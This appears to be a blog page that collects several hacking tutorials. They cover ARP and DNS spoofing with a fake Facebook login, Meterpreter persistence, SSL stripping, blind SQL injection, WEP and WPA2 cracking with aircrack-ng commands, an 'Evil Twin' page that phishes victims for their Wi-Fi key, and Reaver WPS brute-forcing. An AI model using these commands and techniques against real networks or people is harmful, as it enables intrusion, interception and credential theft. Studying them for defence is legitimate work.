Technic Dynamic is a source of education focused in the following categories of technology: (Computer - Design - Gadgets - Networking - Security) Link : http://technicdynamic.com
Following up on the last post, we are gonna take it a little further this time…
Attacker: Backtrack 5 R1 Gnome 32 Victim: Windows XP sp3 Fully Patched
We will spoof the network, this time using arpspoof & dnsspoof just because they provide greater finnesse! For the Social Engineering Toolkit (SET) attack, I am going to use a custom template for Facebook (seen in an earlier post) since it reduces loading time compared to the cloned pages by S.E.T.
For the payload I choose the Meterpreter session in order to upload a
file and make the victim’s Windows machine load that file every time
the computer starts. To achieve this we modify the regedit of the XP box via a vnc session.
I noticed a lot of newcomers have problem adapting to Backtrack Linux
right away, since they don’t know basic functionality and commands. So
I’ve decided to make this video as a starting point to show some of what
is possible on Windows.
On this tutorial we will be using Cain & Abel to sniff SSL
passwords. The user has to agree to a fake certificate in this scenario.
Luckily most users almost always agree without even looking at it.
If you are familiar with Linux I recommend to use it instead since it
is much more networking oriented and possesses a lot more tools (all
free)
We do an ARP Poison on the network to capture all the traffic between router (default gateway) and host.
This time we will be showing a seamless sniffing attack, where the
attacker injects the whole network using ARP poisoning to become the
man-in-the-middle.
After poisoning the network, all SSL / https traffic is redirected to
a normal http (port 10000) without the targets even noticing anything.
To top it off we display a lock icon on the webpage to make it seem like
a https page.
Check out the video in high quality and leave feedback to TechnicDynamic@gmail.com !
This time we will be taking a look at the true & false SQL injection method.
Although most programmers have already noticed this flaw and taken
the right countermeasures to prevent it, due to the large amount of
websites going up everyday, there are still many vulnerable pages.
This method is simple overall, however some knowledge of programming and SQL will be handy.
Basically, we want to locate a dynamic field on the website and make
it return to either true or false. So if we insert a SQL statement
asking the database to return a specific amount of tables and it returns
false, we know the database has less tables than what we suggested.
That is the main logic behind the method!
The easiest way to identify if the return was true or false is,
mostly, simple. Wherever should the dynamic content be on the website,
will be missing (either blank, or upon viewing the source code of the
page, one should see: "You have an error…”).
Still today, it is very common to see small & medium business’ using low security settings on their network’s.
On this educational video, we will be looking at how an attacker
would gain front door access to a network just by monitoring enough data
packets to eventually crack the password.
The wireless network is in default configuration using the WEP encryption method.
Let’s take a look at the gear:
Wireless Network Interface Card: AWUS036NH
Computer using Linux Backtrack 5 Operating System
You can use any Linux distribution you like, but I recommend
Backtrack because it comes with everything you will need pre-installed.
For more information on how to install Backtrack to your computer or run
a Live CD, visit their website by clicking on their logo image. Most
wireless network interface cards are automatically identified by
Backtrack as well.
Make sure you watch the video in high quality (1080p) so you can see the commands:
If you’re relatively new to Linux, I would recommend downloading the commands file
and go through each step following the video. Remember to replace the
devices under ()’s for the proper device. Example in video, (wireless
device) = wlan0.
It’s fair to say WPA 2 has done a lot for wireless networks.
It’s made them more secure that’s for sure. However the threat is
still out there… Turns out, hacking a WPA 2 encrypted network is pretty
similar to cracking a WEP encryption. Let’s see how it’s done… These are
the steps:
1. Put wireless interface down, spoof the mac address (optional) and put wireless interface in monitor mode.
ifconfig wlan0 down
macchanger –mac 00:22:44:66:88:00 wlan0
airmon-ng start wlan0
2. Start sniffing the target wireless network on the specific channel, write capture to file.
airodump-ng -c 1 –bssid Network MAC Addr. -w Capture Filemon0
3. To capture the WPA handshake, either DeAuthenticate a connected host or wait for one to connect.
aireplay-ng -0 0 -a Network MAC Addr. -h Your MAC Addr. -c Client MAC Addr.mon0
4. Now you are ready to crack using the WPA handshake and your wordlist.
aircrack-ng –bssid Network MAC Addr. -w WordlistCapture File
Note: Replace the underlined content on your own execution.
For further details, check out the video in high quality:
In an ealier post, we’ve seen how to crack WPA-2 network keys using a dictionary.
While that technique works, it could take an awful long time, especially when brute forcing.
On this technique, named ‘Evil Twin’, we take a different perspective
to the attack. Using a powerful long range wireless card (Alfa
AWUS036NH), we clone the target network to confuse our victim. Then, we
deauthenticate the victim from his own wireless network and wait until
he connects to our access point – which looks exactly like his.
When the victim connects, he is redirected to a service page asking
for the WPA-2 key in order to access the internet. As soon as we get the
key, you can either allow the victim to use the network (maybe
improvise some password sniffing?) or just bring it down manually.
For this example I created a service page based on Verizon ISP. The
files are placed at the default location (/var/www/). I created a
database called ‘wpa2′, which can be done with the following commands:
Login to MySQL: mysql -u root -p Note: Default backtrack user/pass are root/toor
Create the database: create database wpa2; use wpa2; create table content(key1 VARCHAR(64), key2 VARCHAR(64));
Finally, start apache and mysql services and check everything works, by going typing localhost on a web-browser.
Today we are gonna take a look at the newest tool in hacking wpa/wpa2, Reaver.
This tool bruteforces the Wi-Fi Protected Setup, which uses a PIN
containing 8 unknown digits, if you do the math (10^8) that’s around
100,000,000 possibilities. Upon discovering the PIN, Reaver replies back
the WPA / WPA 2 key.
Note that not all routers are affected by this, as the person who
configured the router might have disabled WPS. It is known however, that
the majority of routers come with WPS enabled.
WPS Synchronization Button
Protecting yourself against this attack is simple: disable WPS. This
is done by accessing your router (usually at 192.168.1.1 at a class C
network), after login in, disable WPS.
